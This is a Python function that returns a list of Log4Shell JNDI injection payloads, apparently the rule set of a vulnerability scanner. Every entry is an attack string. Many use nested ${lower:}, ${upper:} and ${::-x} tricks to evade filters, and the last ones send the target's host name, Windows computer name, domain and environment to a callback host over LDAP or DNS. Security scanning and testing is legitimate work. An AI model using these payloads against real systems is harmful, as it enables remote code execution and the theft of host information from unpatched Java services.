def log4jRules():
    return ["${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{callback_host}}/{{random}}}",
                           "${${::-j}ndi:rmi://{{callback_host}}/{{random}}}",
                           "${jndi:rmi://{{callback_host}}}",
                           "${${lower:jndi}:${lower:rmi}://{{callback_host}}/{{random}}}",
                           "${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}",
                           "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}",
                           "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}",
                           "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}",
                           "${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}",
                           "${jndi:rmi://adsasd.asdasd.asdasd}",
                           "${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}",
                           "${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}",
                           "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}",
                           "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}",
                           "${jndi:ldap://127.0.0.1:1389/ badClassName}",
                           "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{callback_host}}/sploit}",
                           "${${::-j}ndi:rmi://{{callback_host}}/sploit}",
                           "${jndi:rmi://{{callback_host}}}",
                           "${${lower:jndi}:${lower:rmi}://{{callback_host}}/sploit}",
                           "${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/sploit}",
                           "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/sploit}",
                           "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/sploit}",
                           "${${upper:jndi}:${upper:rmi}://{{callback_host}}/sploit}",
                           "${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://{{callback_host}}/sploit}",
                           "${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/sploit}",
                           "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.{{callback_host}}}",
                           "${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostName}.{{callback_host}}}",
                           "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.{{callback_host}}}",
                           "${jndi:dns://{{callback_host}}}"]
